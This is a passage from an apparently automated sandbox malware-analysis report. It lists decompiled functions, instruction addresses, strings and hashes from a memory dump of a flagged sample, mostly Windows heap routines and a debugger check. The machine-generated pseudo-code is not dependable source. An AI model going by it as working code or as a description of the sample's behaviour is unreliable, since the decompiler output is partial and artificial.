					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x18d6378 = 1;
						asm("int3");
						 *0x18d6378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                                        0x017e40e6
                                                        0x017e40e8
                                                        0x017e40f1
                                                        0x0184042d
                                                        0x0184044c
                                                        0x01840451
                                                        0x0184042f
                                                        0x01840444
                                                        0x01840449
                                                        0x0184045d
                                                        0x01840466
                                                        0x0184046e
                                                        0x01840474
                                                        0x01840475
                                                        0x0184047a
                                                        0x0184048a
                                                        0x0184048c
                                                        0x01840493
                                                        0x01840494
                                                        0x01840494
                                                        0x00000000
                                                        0x0184049b
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                        • API String ID: 0-188067316
                                                        • Opcode ID: 28d1a3529a0c274c3e4642afeb537cadba2000c715abb7db46a367eb8d6aa473
                                                        • Instruction ID: b57d246bf6ad0382cfa8992fbf1ea271a17e332baec74de23b6ef08604b7ac64
                                                        • Opcode Fuzzy Hash: 28d1a3529a0c274c3e4642afeb537cadba2000c715abb7db46a367eb8d6aa473
                                                        • Instruction Fuzzy Hash: 22012832102246AFD2299B6DE4DDF96FBE4DB04F34F28406EF10587741CEB4D540C611
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0180A830 Relevance: 5.4, Strings: 4, Instructions: 350COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 70%
                                                        			E0180A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x18d8748 - 1;
					if( *0x18d8748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E017EB150();
									_t260 = _t257 + 4;
								} else {
									E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E017EB150();
								_t257 = _t260 + 4;
								__eflags =  *0x18d7bc8;
								if(__eflags == 0) {
									E018A2073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E018AA80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E0183D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E0180AB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E018AA80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E018AA80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x18d8748 - 1;
					if( *0x18d8748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E017EB150();
							} else {
								E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E017EB150();
							__eflags =  *0x18d7bc8;
							if(__eflags == 0) {
								_t131 = E018A2073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}























































                                                        0x0180a83a
                                                        0x0180a83c
                                                        0x0180a83e
                                                        0x0180a841
                                                        0x0180a844
                                                        0x0180a84a
                                                        0x0180aa53
                                                        0x0180aa59
                                                        0x0180aa59
                                                        0x0180a858
                                                        0x0180a85e
                                                        0x0180aaf5
                                                        0x0180aafc
                                                        0x0185229e
                                                        0x018522a2
                                                        0x018522a8
                                                        0x018522b3
                                                        0x018522b5
                                                        0x018522bb
                                                        0x018522c1
                                                        0x018522c5
                                                        0x018522e6
                                                        0x018522eb
                                                        0x018522f0
                                                        0x018522c7
                                                        0x018522dc
                                                        0x018522e1
                                                        0x018522e1
                                                        0x018522f3
                                                        0x018522f8
                                                        0x018522fd
                                                        0x01852300
                                                        0x01852307
                                                        0x0185230e
                                                        0x0185230e
                                                        0x01852313
                                                        0x01852313
                                                        0x018522b5
                                                        0x018522a2
                                                        0x0180aafc
                                                        0x0180a864
                                                        0x0180a869
                                                        0x0180aa5c
                                                        0x0180aa5e
                                                        0x0180a86f
                                                        0x0180a87f
                                                        0x0180a885
                                                        0x0180a885
                                                        0x0180a88b
                                                        0x0180a890
                                                        0x0180a896
                                                        0x0180ab0c
                                                        0x0180ab0f
                                                        0x0180ab15
                                                        0x01852320
                                                        0x01852320
                                                        0x0180ab1b
                                                        0x0180a89c
                                                        0x0180a89f
                                                        0x0180a8a2
                                                        0x0180a8a2
                                                        0x0180a8a5
                                                        0x0180a8af
                                                        0x0180a8b3
                                                        0x0180a8b8
                                                        0x0180aa66
                                                        0x0180a8be
                                                        0x0180a8c5
                                                        0x0180a8c6
                                                        0x0180a8ce
                                                        0x01852328
                                                        0x01852332
                                                        0x01852337
                                                        0x01852337
                                                        0x0180a8ce
                                                        0x0180a8d4
                                                        0x0180a8d8
                                                        0x0180a8db
                                                        0x0180a8de
                                                        0x0180a8e1
                                                        0x0180a8e5
                                                        0x0180a8e8
                                                        0x0180a8f0
                                                        0x0180a8f3
                                                        0x0185234c
                                                        0x01852350
                                                        0x01852355
                                                        0x01852359
                                                        0x01852359
                                                        0x0180a8f9
                                                        0x0180a901
                                                        0x0180aae4
                                                        0x0180aae4
                                                        0x0180aaea
                                                        0x00000000
                                                        0x0180a907
                                                        0x0180a90a
                                                        0x0180a91d
                                                        0x0180a91d
                                                        0x00000000
                                                        0x0180a910
                                                        0x0180a910
                                                        0x0180a910
                                                        0x0180a914
                                                        0x0180a924
                                                        0x0180a924
                                                        0x0180a924
                                                        0x0180a924
                                                        0x0180a916
                                                        0x0180a91b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0180a91b
                                                        0x0180a925
                                                        0x0180a925
                                                        0x0180a932
                                                        0x0180a936
                                                        0x0180a93c
                                                        0x0180a93c
                                                        0x0180a93c
                                                        0x0180ab22
                                                        0x0180ab24
                                                        0x0180ab27
                                                        0x0180ab27
                                                        0x0180a942
                                                        0x0180a944
                                                        0x0180aaba
                                                        0x0180aabd
                                                        0x0180aac0
                                                        0x0180aac0
                                                        0x0180aac2
                                                        0x0180ab2f
                                                        0x0180aac4
                                                        0x0180aac4
                                                        0x0180aac7
                                                        0x0180aaca
                                                        0x0180aacc
                                                        0x0180aace
                                                        0x0180aace
                                                        0x0180aace
                                                        0x0180aad1
                                                        0x0180aad1
                                                        0x0180aad7
                                                        0x0180aad9
                                                        0x00000000
                                                        0x00000000
                                                        0x01852361
                                                        0x01852369
                                                        0x0185236b
                                                        0x00000000
                                                        0x01852371
                                                        0x00000000
                                                        0x01852371
                                                        0x00000000
                                                        0x0185236b
                                                        0x0180aac0
                                                        0x0180a94a
                                                        0x0180a94a
                                                        0x0180a94d
                                                        0x0180a94d
                                                        0x0180a950
                                                        0x0180a954
                                                        0x01852376
                                                        0x01852380
                                                        0x0180a95a
                                                        0x0180a95a
                                                        0x0180a95c
                                                        0x0180a95f
                                                        0x0180a961
                                                        0x0180a961
                                                        0x0180a967
                                                        0x0180a96a
                                                        0x0180a972
                                                        0x0180aa02
                                                        0x0180aa06
                                                        0x0180aa10
                                                        0x0180aa16
                                                        0x0180aa16
                                                        0x0180aa1b
                                                        0x0180aa21
                                                        0x0180aa24
                                                        0x0180aa27
                                                        0x0180aa29
                                                        0x0180aa2c
                                                        0x0180aa32
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0180a978
                                                        0x0180a978
                                                        0x0180a97b
                                                        0x0180a981
                                                        0x0180a996
                                                        0x0180a998
                                                        0x0180a99f
                                                        0x0180a9a2
                                                        0x0185238a
                                                        0x0180a9a8
                                                        0x0180a9a8
                                                        0x0180a9a8
                                                        0x0180a9aa
                                                        0x0180a9ad
                                                        0x0180a9b0
                                                        0x0180a9bb
                                                        0x0180a9be
                                                        0x0180a9c7
                                                        0x0180a9c9
                                                        0x0180a9c9
                                                        0x0180a9cc
                                                        0x0180a9d1
                                                        0x0180aa6d
                                                        0x0180aa70
                                                        0x0180aa73
                                                        0x0180aa75
                                                        0x0180aa79
                                                        0x0180aa7e
                                                        0x0180aa82
                                                        0x0180aa8f
                                                        0x0180aa94
                                                        0x0180aa96
                                                        0x01852392
                                                        0x018523a1
                                                        0x018523a1
                                                        0x0180aa9c
                                                        0x0180aa9f
                                                        0x0180aaa2
                                                        0x0180aaa2
                                                        0x0180aaa8
                                                        0x0180aaab
                                                        0x0180aaaf
                                                        0x00000000
                                                        0x0180aab5
                                                        0x00000000
                                                        0x0180aab5
                                                        0x0180a9d7
                                                        0x0180a9d7
                                                        0x0180a9da
                                                        0x0180a9e0
                                                        0x0180a9e3
                                                        0x0180a9e6
                                                        0x0180a9e9
                                                        0x0180a9eb
                                                        0x0180a9fd
                                                        0x0180a9fd
                                                        0x00000000
                                                        0x0180a9eb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0180a983
                                                        0x0180a983
                                                        0x0180a983
                                                        0x0180a987
                                                        0x0180a995
                                                        0x0180a995
                                                        0x0180a995
                                                        0x0180a995
                                                        0x0180a989
                                                        0x0180a98e
                                                        0x00000000
                                                        0x0180a990
                                                        0x00000000
                                                        0x0180a990
                                                        0x0180a98e
                                                        0x00000000
                                                        0x0180a983
                                                        0x0180a972
                                                        0x0180a90a
                                                        0x0180aa34
                                                        0x0180aa34
                                                        0x0180aa40
                                                        0x0180aa43
                                                        0x0180aa46
                                                        0x0180aa4d
                                                        0x018523ab
                                                        0x018523b2
                                                        0x018523b8
                                                        0x018523be
                                                        0x018523c3
                                                        0x018523c5
                                                        0x018523cb
                                                        0x018523d1
                                                        0x018523d5
                                                        0x018523f6
                                                        0x018523fb
                                                        0x018523d7
                                                        0x018523ec
                                                        0x018523f1
                                                        0x01852403
                                                        0x01852408
                                                        0x01852410
                                                        0x01852417
                                                        0x01852422
                                                        0x01852422
                                                        0x01852417
                                                        0x018523c5
                                                        0x018523b2
                                                        0x00000000

                                                        Strings
                                                        • HEAP: , xrefs: 018522E6, 018523F6
                                                        • HEAP[%wZ]: , xrefs: 018522D7, 018523E7
                                                        • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01852403
                                                        • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 018522F3
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                        • API String ID: 0-1657114761
                                                        • Opcode ID: 1a0746eea443ae338abda0bbe5f9ed7861dca17988c326295d90cbec583d583d
                                                        • Instruction ID: d2dbc69be9a2beee8d081f0c1ca0359710527d5888786932778c61cdc68bb085
                                                        • Opcode Fuzzy Hash: 1a0746eea443ae338abda0bbe5f9ed7861dca17988c326295d90cbec583d583d
                                                        • Instruction Fuzzy Hash: 72D1BF3460030A8FDB5ACF68C890BA9BBF2FF48304F158569D956DB386D730AA41CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0180A229 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 69%
                                                        			E0180A229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E0180DF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E01829730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E018AA80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E01829660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E017EB150();
					} else {
						E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E017EB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E01807D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E018A138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E01807D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E01807D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E018A1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E01807D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E01807D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E018A1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E0183D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                                                        0x0180a229
                                                        0x0180a231
                                                        0x0180a23f
                                                        0x0180a242
                                                        0x0180a244
                                                        0x0180a24c
                                                        0x0180a255
                                                        0x0180a25a
                                                        0x0180a25f
                                                        0x01851c76
                                                        0x01851c78
                                                        0x01851c7e
                                                        0x01851c7f
                                                        0x01851c81
                                                        0x01851c82
                                                        0x01851c84
                                                        0x01851c89
                                                        0x01851c8b
                                                        0x01851c9e
                                                        0x01851c9e
                                                        0x01851cab
                                                        0x01851cb2
                                                        0x00000000
                                                        0x01851cb2
                                                        0x01851c8d
                                                        0x01851c92
                                                        0x00000000
                                                        0x00000000
                                                        0x01851c94
                                                        0x01851c98
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01851c98
                                                        0x0180a265
                                                        0x0180a265
                                                        0x0180a266
                                                        0x0180a26f
                                                        0x0180a270
                                                        0x0180a276
                                                        0x0180a277
                                                        0x0180a279
                                                        0x0180a27e
                                                        0x0180a282
                                                        0x01851db5
                                                        0x01851dbb
                                                        0x01851dc1
                                                        0x01851dc5
                                                        0x01851de4
                                                        0x01851de9
                                                        0x01851dc7
                                                        0x01851ddc
                                                        0x01851de1
                                                        0x01851def
                                                        0x01851df3
                                                        0x01851df7
                                                        0x01851dfe
                                                        0x01851e06
                                                        0x0180a302
                                                        0x0180a308
                                                        0x0180a308
                                                        0x0180a288
                                                        0x0180a28d
                                                        0x0180a294
                                                        0x01851cc1
                                                        0x0180a29a
                                                        0x0180a29a
                                                        0x0180a29a
                                                        0x0180a29f
                                                        0x01851ccb
                                                        0x01851cd1
                                                        0x01851cd8
                                                        0x01851cea
                                                        0x01851cea
                                                        0x01851cd8
                                                        0x0180a2a9
                                                        0x0180a2af
                                                        0x0180a2bc
                                                        0x01851cfd
                                                        0x0180a2c2
                                                        0x0180a2c2
                                                        0x0180a2c2
                                                        0x0180a2c7
                                                        0x01851d07
                                                        0x01851d0d
                                                        0x01851d14
                                                        0x01851d1f
                                                        0x01851d21
                                                        0x01851d2c
                                                        0x01851d2c
                                                        0x01851d2c
                                                        0x01851d47
                                                        0x01851d47
                                                        0x01851d14
                                                        0x0180a2cd
                                                        0x0180a2d2
                                                        0x0180a2d9
                                                        0x01851d5a
                                                        0x0180a2df
                                                        0x0180a2df
                                                        0x0180a2df
                                                        0x0180a2e4
                                                        0x01851d69
                                                        0x01851d6b
                                                        0x01851d76
                                                        0x01851d76
                                                        0x01851d76
                                                        0x01851d91
                                                        0x01851d91
                                                        0x0180a2ea
                                                        0x0180a2f0
                                                        0x0180a2f5
                                                        0x01851da8
                                                        0x01851dad
                                                        0x01851dad
                                                        0x0180a2fd
                                                        0x0180a300
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                        • API String ID: 2994545307-2586055223
                                                        • Opcode ID: ba112dbc768729f0fd171e2fe26e1db6e19724569f9fee3a2919aea19e0a6538
                                                        • Instruction ID: 1387091ae16a3f546ea063be04496b94e198440b4620baefbde282744433aef1
                                                        • Opcode Fuzzy Hash: ba112dbc768729f0fd171e2fe26e1db6e19724569f9fee3a2919aea19e0a6538
                                                        • Instruction Fuzzy Hash: 4251E3322057859FE362DB6CCC48F677BE8EB84B54F080568F955CB2D1D725EA40C762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018A49A4 Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
